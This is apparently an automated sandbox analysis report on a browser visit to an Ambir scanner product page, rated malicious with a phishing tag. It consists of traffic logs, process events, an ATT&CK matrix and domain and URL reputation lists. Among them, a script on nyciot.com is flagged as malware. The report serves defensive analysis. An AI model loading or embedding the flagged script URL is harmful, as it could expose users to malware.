      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
      Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
      Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.5:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.5:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:50032 version: TLS 1.2
      Source: classification engineClassification label: mal80.phis.win@24/236@150/49
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1924,i,8983831127746973449,12403637480214134868,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ambir.com/ambir-card-scanners/"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6160 --field-trial-handle=1924,i,8983831127746973449,12403637480214134868,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1924,i,8983831127746973449,12403637480214134868,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6160 --field-trial-handle=1924,i,8983831127746973449,12403637480214134868,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      1
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://ambir.com/ambir-card-scanners/0%Avira URL Cloudsafe
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://ambir.com/market-solutions/hospitality-rental/0%Avira URL Cloudsafe
      https://ambir.com/esignature-solutions/0%Avira URL Cloudsafe
      https://meritdesigns.com0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2023/10/Partners_Document_Scanners-768x504.jpg0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/02/DS820_DS830_Shopify_square-768x768.jpg0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/02/DS690_Shopify_square-150x150.jpg0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/02/DS687_Shopify_square-100x100.jpg0%Avira URL Cloudsafe
      https://ambir.com/privacy-policy/0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/02/DS820_DS830_Shopify_square-2048x2048.jpg0%Avira URL Cloudsafe
      https://ambir.com/ambir-card-scanners/#primaryimage0%Avira URL Cloudsafe
      https://ambir.com/market-solutions/government-solutions/0%Avira URL Cloudsafe
      https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-9eda13b5.min.js0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/03/comparison_chart_thumb_2024-600x464.png0%Avira URL Cloudsafe
      https://ambir.com/barcode-scanners/0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/02/DS820_DS830_Shopify_square-600x600.jpg0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/02/PS600_Shopify_square-1536x1536.jpg0%Avira URL Cloudsafe
      https://ambir.com/wp-json/wp/v2/pages/29900%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2023/09/logos.png0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/02/PS670_Shopify_square-1536x1536.jpg0%Avira URL Cloudsafe
      https://ambir.com/wp-content/themes/ambir/css/font-awesome.css0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/02/PS670_Shopify_square-768x768.jpg0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2023/10/Banking_card_scanners-1024x631.jpg0%Avira URL Cloudsafe
      https://ambir.com/product/imagescan-pro-490i-scanner-ds490-as/0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/02/PS670_Shopify_square-600x600.jpg0%Avira URL Cloudsafe
      https://ambir.com/market-solutions/financial-solutions/0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/02/DS490_Shopify_square-300x300.jpg0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/02/DS687_Shopify_square-300x300.jpg0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2023/08/Ambir_logo_22.png0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2023/08/slide2-300x177.jpg0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/02/DS820_DS830_Shopify_square-1024x1024.jpg0%Avira URL Cloudsafe
      https://ambir.com/dental-solutions/0%Avira URL Cloudsafe
      https://ambir.com/barcode-scanner-set-up/0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/10/Untitled-design-6.png0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/02/PS600_Shopify_square-150x150.jpg0%Avira URL Cloudsafe
      https://ambir.com/product/simplex-id-card-scanner-w-ambirscan-ps667-as/0%Avira URL Cloudsafe
      https://ambir.com/high-speed-adf-workgroup-scanners/0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/02/DS490_Shopify_square-100x100.jpg0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2023/10/PS667_DS687_Card_Scanners-600x122.jpg0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2023/08/slide2.jpg0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2023/09/AmbirScan_cloud_cap_NL-768x583.jpg0%Avira URL Cloudsafe
      https://ambir.com/blog/ambir-announces-certification-of-its-scanners-for-docmgt/0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/02/PS667_Shopify_square-150x150.jpg0%Avira URL Cloudsafe
      https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-c51b1940.min.css0%Avira URL Cloudsafe
      https://ambir.com/ambir-for-docmgt/0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/02/DS490_Shopify_square-768x768.jpg0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/02/PS670_Shopify_square.jpg0%Avira URL Cloudsafe
      https://ambir.com/nscan-1060-60-ppm-high-speed-document-document-card-and-passport-scanner/0%Avira URL Cloudsafe
      https://ambir.com/sigpad-setup-tw/0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2023/08/cropped-favicon-270x270.png0%Avira URL Cloudsafe
      https://nyciot.com/je5vl.js100%Avira URL Cloudmalware
      https://ambir.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/03/comparison_chart_thumb_2024-768x594.png0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2023/08/cropped-favicon-180x180.png0%Avira URL Cloudsafe
      https://ambir.com/market-solutions/transportation-solutions-2/0%Avira URL Cloudsafe
      https://ambir.com/support/0%Avira URL Cloudsafe
      https://www.ambirproductreg.com/myapp/product-registration0%Avira URL Cloudsafe
      https://ambir.com/contact-us/0%Avira URL Cloudsafe
      https://ambir.com/product/nscan-700gt-hybrid-duplex-document-and-card-scanner-with-ambirscan-ds700gt0%Avira URL Cloudsafe
      https://ambir.com/extended-warranties/0%Avira URL Cloudsafe
      https://ambir.com/wp-content/themes/ambir/style.css?v=17321272390%Avira URL Cloudsafe
      https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-9afea242.min.css0%Avira URL Cloudsafe
      https://ambir.com/news-room/0%Avira URL Cloudsafe
      https://ambir.com/product/travelscan-pro-simplex-document-id-scanner-with-ambirscan-ps600-as/0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2023/10/card-document-scanners_225h.jpg0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/02/DS490_Shopify_square-1536x1536.jpg0%Avira URL Cloudsafe
      https://ambir.com/faqs/0%Avira URL Cloudsafe
      https://ambir.com/wp-content/uploads/2024/02/PS667_Shopify_square-768x768.jpg0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      sdks.shopifycdn.com
      185.146.173.20
      truefalse
        high
        knrpc.olark.com
        34.96.127.16
        truefalse
          high
          pug-sin12.pubmnet.com
          207.65.33.82
          truefalse
            high
            ambir.com
            141.193.213.10
            truefalse
              high
              adserver-vpc-alb-0-1210614323.ap-southeast-1.elb.amazonaws.com
              54.255.252.168
              truefalse
                high
                h2-stratus.zohocdn.com
                199.67.80.86
                truefalse
                  high
                  user-data-eu.bidswitch.net
                  35.214.136.108
                  truefalse
                    high
                    eu-eb2.3lift.com
                    13.248.245.213
                    truefalse
                      high
                      zpublic.zohopublic.com
                      136.143.182.97
                      truefalse
                        high
                        stats.g.doubleclick.net
                        66.102.1.155
                        truefalse
                          high
                          scontent.xx.fbcdn.net
                          157.240.195.15
                          truefalse
                            high
                            idsync.rlcdn.com
                            35.244.154.8
                            truefalse
                              high
                              log1.olark.com
                              34.96.127.16
                              truefalse
                                high
                                platform-api.sharethis.com
                                13.227.8.5
                                truefalse
                                  high
                                  cdnjs.cloudflare.com
                                  104.17.25.14
                                  truefalse
                                    high
                                    cm.g.doubleclick.net
                                    142.250.181.66
                                    truefalse
                                      high
                                      www.google.com
                                      142.250.181.100
                                      truefalse
                                        high
                                        dcs-ups.g03.yahoodns.net
                                        77.238.180.12
                                        truefalse
                                          high
                                          api.olark.com
                                          34.96.127.16
                                          truefalse
                                            high
                                            match.adsrvr.org
                                            35.71.131.137
                                            truefalse
                                              high
                                              pixel.tapad.com
                                              34.111.113.62
                                              truefalse
                                                high
                                                pippio.com
                                                107.178.254.65
                                                truefalse
                                                  high
                                                  d1qug1xf2dk5z6.cloudfront.net
                                                  18.165.220.61
                                                  truefalse
                                                    high
                                                    us-u.openx.net
                                                    35.244.159.8
                                                    truefalse
                                                      high
                                                      sludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.com
                                                      13.251.238.118
                                                      truefalse
                                                        high
                                                        nyciot.com
                                                        45.61.136.196
                                                        truefalse
                                                          high
                                                          maxcdn.bootstrapcdn.com
                                                          104.18.10.207
                                                          truefalse
                                                            high
                                                            wndc1.outbrain.org
                                                            52.250.45.119
                                                            truefalse
                                                              high
                                                              il-vip001.taboola.com
                                                              185.106.33.48
                                                              truefalse
                                                                high
                                                                accounts.zoho.com
                                                                136.143.190.100
                                                                truefalse
                                                                  high
                                                                  analytics-alv.google.com
                                                                  216.239.36.181
                                                                  truefalse
                                                                    high
                                                                    www.cloudflare.com
                                                                    104.16.123.96
                                                                    truefalse
                                                                      high
                                                                      googleads.g.doubleclick.net
                                                                      142.250.181.34
                                                                      truefalse
                                                                        high
                                                                        dsum-sec.casalemedia.com
                                                                        104.18.26.193
                                                                        truefalse
                                                                          high
                                                                          d28140lin2gosl.cloudfront.net
                                                                          108.158.75.29
                                                                          truefalse
                                                                            unknown
                                                                            acsbapp.com
                                                                            104.22.1.204
                                                                            truefalse
                                                                              high
                                                                              td.doubleclick.net
                                                                              172.217.17.66
                                                                              truefalse
                                                                                high
                                                                                fp2e04.wac.rhocdn.net
                                                                                192.229.233.34
                                                                                truefalse
                                                                                  high
                                                                                  ib.anycast.adnxs.com
                                                                                  37.252.171.21
                                                                                  truefalse
                                                                                    high
                                                                                    d.adroll.com
                                                                                    unknown
                                                                                    unknownfalse
                                                                                      high
                                                                                      ups.analytics.yahoo.com
                                                                                      unknown
                                                                                      unknownfalse
                                                                                        high
                                                                                        use.fontawesome.com
                                                                                        unknown
                                                                                        unknownfalse
                                                                                          high
                                                                                          image2.pubmatic.com
                                                                                          unknown
                                                                                          unknownfalse
                                                                                            high
                                                                                            static.zohocdn.com
                                                                                            unknown
                                                                                            unknownfalse
                                                                                              high
                                                                                              sync.outbrain.com
                                                                                              unknown
                                                                                              unknownfalse
                                                                                                high
                                                                                                sync.taboola.com
                                                                                                unknown
                                                                                                unknownfalse
                                                                                                  high
                                                                                                  x.bidswitch.net
                                                                                                  unknown
                                                                                                  unknownfalse
                                                                                                    high
                                                                                                    pixel.rubiconproject.com
                                                                                                    unknown
                                                                                                    unknownfalse
                                                                                                      high
                                                                                                      log.olark.com
                                                                                                      unknown
                                                                                                      unknownfalse
                                                                                                        high
                                                                                                        s.adroll.com
                                                                                                        unknown
                                                                                                        unknownfalse
                                                                                                          high
                                                                                                          connect.facebook.net
                                                                                                          unknown
                                                                                                          unknownfalse
                                                                                                            high
                                                                                                            px.ads.linkedin.com
                                                                                                            unknown
                                                                                                            unknownfalse
                                                                                                              high
                                                                                                              x.adroll.com
                                                                                                              unknown
                                                                                                              unknownfalse
                                                                                                                high
                                                                                                                forms.zohopublic.com
                                                                                                                unknown
                                                                                                                unknownfalse
                                                                                                                  high
                                                                                                                  static.olark.com
                                                                                                                  unknown
                                                                                                                  unknownfalse
                                                                                                                    high
                                                                                                                    analytics.google.com
                                                                                                                    unknown
                                                                                                                    unknownfalse
                                                                                                                      high
                                                                                                                      ib.adnxs.com
                                                                                                                      unknown
                                                                                                                      unknownfalse
                                                                                                                        high
                                                                                                                        webfonts.zohowebstatic.com
                                                                                                                        unknown
                                                                                                                        unknownfalse
                                                                                                                          high
                                                                                                                          eb2.3lift.com
                                                                                                                          unknown
                                                                                                                          unknownfalse
                                                                                                                            high
                                                                                                                            NameMaliciousAntivirus DetectionReputation
                                                                                                                            https://pixel.tapad.com/idsync/ex/receive/check?partner_id=3521&partner_device_id=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&gdpr=0&gdpr_consent=false
                                                                                                                              high
                                                                                                                              https://forms.zohopublic.com/ambirtech/form/ScannerBrochureDownload/formperma/Ariy9HGiAVXh5JfOrGqqgQZdZYr8pgPgm4tTdrChjcUfalse
                                                                                                                                high
                                                                                                                                https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-9eda13b5.min.jsfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://static.olark.com/jsclient/sounds/olark-chimes.oggfalse
                                                                                                                                  high
                                                                                                                                  https://ambir.com/wp-content/themes/ambir/css/font-awesome.cssfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://static.zohocdn.com/forms/css/themes/custom.d603ed592e55f07d313b63112b930fbf.cssfalse
                                                                                                                                    high
                                                                                                                                    https://sync.outbrain.com/cookie-sync?p=adroll&uid=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&gdpr=0&gdpr_consent=&us_privacy=1---false
                                                                                                                                      high
                                                                                                                                      https://idsync.rlcdn.com/1000.gif?memo=CMiIFxIrCicIARDqIhogMTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2UQABoNCPqM-bkGEgUI6AcQAEIASgAfalse
                                                                                                                                        high
                                                                                                                                        https://cm.g.doubleclick.net/pixel?google_sc&google_nid=artb&google_hm=FrHkntYnWZqMUnuWCtu4Pgfalse
                                                                                                                                          high
                                                                                                                                          https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-c51b1940.min.cssfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://static.zohocdn.com/forms/js/formscommonlive.edbb0f480ff95d2fca0876bafe97f584.jsfalse
                                                                                                                                            high
                                                                                                                                            https://accounts.zoho.com/static/showcaptcha?digest=1_C_38981b8bddce8f162a418db411f998572c5cedc5527ed5cb91c0d48ae1d4feb63474de35340d2e69db0bcf470182544679866327c1bf1bf70db3eecfa72f2b6cfalse
                                                                                                                                              high
                                                                                                                                              https://d.adroll.com/segment/GXXT3DJJNNBKHGBC62RAND/PQV7D44IFRBCBMEQBHSAR6?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&cookie=&adroll_s_ref=&keyw=&p0=12769&adroll_external_data=&xa4=1&adroll_version=2.0false
                                                                                                                                                high
                                                                                                                                                https://static.olark.com/jsclient/fonts/noto-sans-v11-latin-700.woff2false
                                                                                                                                                  high
                                                                                                                                                  https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.pngfalse
                                                                                                                                                    high
                                                                                                                                                    https://nyciot.com/je5vl.jstrue
                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                    unknown
                                                                                                                                                    https://ambir.com/wp-content/themes/ambir/style.css?v=1732127239false
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://match.adsrvr.org/track/cmf/generic?ttd_pid=tapad&ttd_tpi=1&ttd_puid=fca0ae6b-4903-4b6e-b6de-6aa8c515508a%252C%252C&gdpr=0&gdpr_consent=false
                                                                                                                                                      high
                                                                                                                                                      https://static.zohocdn.com/forms/js/formsthirdpartylivejs.62943a8ee9919d8253e7be70bab3de1c.jsfalse
                                                                                                                                                        high
                                                                                                                                                        https://acsbapp.com/apps/app/dist/js/app.jsfalse
                                                                                                                                                          high
                                                                                                                                                          https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-9afea242.min.cssfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://knrpc.olark.com/nrpc/p?j=olark-11732134538640&&c=pollevents&q=828.38639.1&i=tM65kxeIWm5Vcm4e542fr0UBjA8B6bor&s=7486-534-10-2045&v=QnUrnKaYLl744rSP542fr0UBrj6a8ok0&g=undefined&cb=hbl.client.callbacks.pollevents&next_poll_time=15000&version=api-1.2.1&pretty=true&_rnd=0.8438471990110759false
                                                                                                                                                            high
                                                                                                                                                            https://ambir.com/wp-content/uploads/2023/10/card-document-scanners_225h.jpgfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                            https://ambir.com/ambir-card-scanners/#primaryimagechromecache_181.2.drtrue
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://ambir.com/market-solutions/hospitality-rental/chromecache_181.2.drfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://ambir.com/wp-content/uploads/2024/02/DS687_Shopify_square-100x100.jpgchromecache_181.2.drfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://ambir.com/esignature-solutions/chromecache_181.2.drfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://meritdesigns.comchromecache_159.2.drfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://ambir.com/wp-content/uploads/2024/02/DS820_DS830_Shopify_square-768x768.jpgchromecache_181.2.drfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://ambir.com/wp-content/uploads/2023/10/Partners_Document_Scanners-768x504.jpgchromecache_181.2.drfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://swiperjs.comchromecache_148.2.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://ambir.com/wp-content/uploads/2024/02/DS690_Shopify_square-150x150.jpgchromecache_181.2.drfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://ambir.com/wp-content/uploads/2024/02/DS820_DS830_Shopify_square-2048x2048.jpgchromecache_181.2.drfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://ambir.com/privacy-policy/chromecache_181.2.drfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
